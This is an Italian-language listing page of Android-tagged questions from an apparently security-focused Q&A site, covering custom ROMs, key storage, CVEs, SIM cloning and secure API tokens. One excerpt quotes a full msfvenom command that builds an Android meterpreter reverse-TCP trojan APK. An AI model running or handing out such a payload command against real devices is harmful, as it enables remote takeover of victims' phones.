Domande con tag 'android'

1
risposta

Valutare i compromessi di sicurezza con LineageOS su telefoni Android precedenti

Nella configurazione di uno smartphone Sony Xperia ZR prodotto nel 2013 e con Android 4.4.1, sto lavorando per comprendere i compromessi relativi al caricamento della ROM personalizzata LineageOS 14.1, basata sulla versione 7.1.1 di AOSP. Il...
posta 21.11.2017 - 00:17
1
risposta

Metasploit crea file .ZIP invece di file .APK?

Mi sono esercitato usando un vecchio dispositivo Android e Kali Linux. Ho impostato il file .kap trojan come al solito, usando il comando msfvenom -p android/meterpreter/reverse_tcp LHOST=MyIP LPORT=RandomPort R> /root/Android.apk Inizia...
posta 17.01.2017 - 10:41
2
risposte

Che cosa è esattamente CVE-2016-3862 e come funziona?

Ne ho sentito parlare forse una settimana fa e mi sembra una vulnerabilità estremamente critica. Ma non ho trovato alcuna descrizione tecnica di esso. Solo che è possibile eseguire il codice da remoto solo inviando l'immagine appositamente creat...
posta 11.09.2016 - 23:03
1
risposta

Keychain vs KeyStore vs TrustStore

Sono abbastanza confuso tra i tre, e una ricerca su Google non è venuta fuori molto. Qualcuno può spiegare?     
posta 23.08.2016 - 10:05
3
risposte

Memorizza i token API in modo sicuro su Android per identificare lo sviluppatore

Stiamo creando una libreria Android per le nostre API Rest che gli sviluppatori di app accederanno con un token univoco. Dato che si tratta di un servizio a pagamento, e si tratta di un modello di prezzo per richiesta o per installazione, come s...
posta 25.11.2015 - 09:20
1
risposta

Come si applica la Corruzione della Memoria ad Android?

Ho studiato diversi attacchi DoS in Android, ad esempio: CVE-2015-1474 CVE-2013-5933 CVE-2013-4710 CVE-2012-6301 ecc. E anche se ho trovato gli attacchi DoS all'interno di Android di difficile comprensione all'inizio ....
posta 23.05.2015 - 01:15
1
risposta

C'è una backdoor nell'hardware dei nostri smartphone?

Non so per te, ma ho sempre pensato che Android non sia sicuro in particolare. Qualcuno, il governo o altro, è in grado di ascoltare il mio microfono o accedere al mio disco rigido da remoto? Mi chiedo se app sicure come Textsecure e Redphone...
posta 22.05.2015 - 08:59
2
risposte

Potrebbe essere installata un'applicazione radice nella scheda SIM

Nel terzo episodio di Mr.Robot, un personaggio ha inserito una scheda Micro-SD in uno smartphone per poterla rootare e ottenere informazioni, quindi ho pensato che forse qualcuno avrebbe potuto montare un root-kit su una Sim-card. Sarebbe possib...
posta 12.07.2015 - 22:39
1
risposta

Protezione dalla Sim Card Clonazione [chiusa]

Il mio amico ha avuto un problema con il suo telefono. In qualche modo si comportava in modo strano, sapevo che qualcuno la stava hackerando. Ho provato ad aiutarla eseguendo un blocco PIN e un reset di fabbrica del suo telefono Android (version...
posta 01.10.2016 - 16:51
3
risposte

Invio di informazioni sicure dall'app con ssl

Sono uno sviluppatore web, ma occasionalmente passo a fare qualche sviluppo di app per dispositivi mobili qua e là. Un cliente mi ha recentemente chiesto di aiutarli a sviluppare un'applicazione molto semplice. L'app è essenzialmente solo un mod...
posta 31.01.2013 - 17:28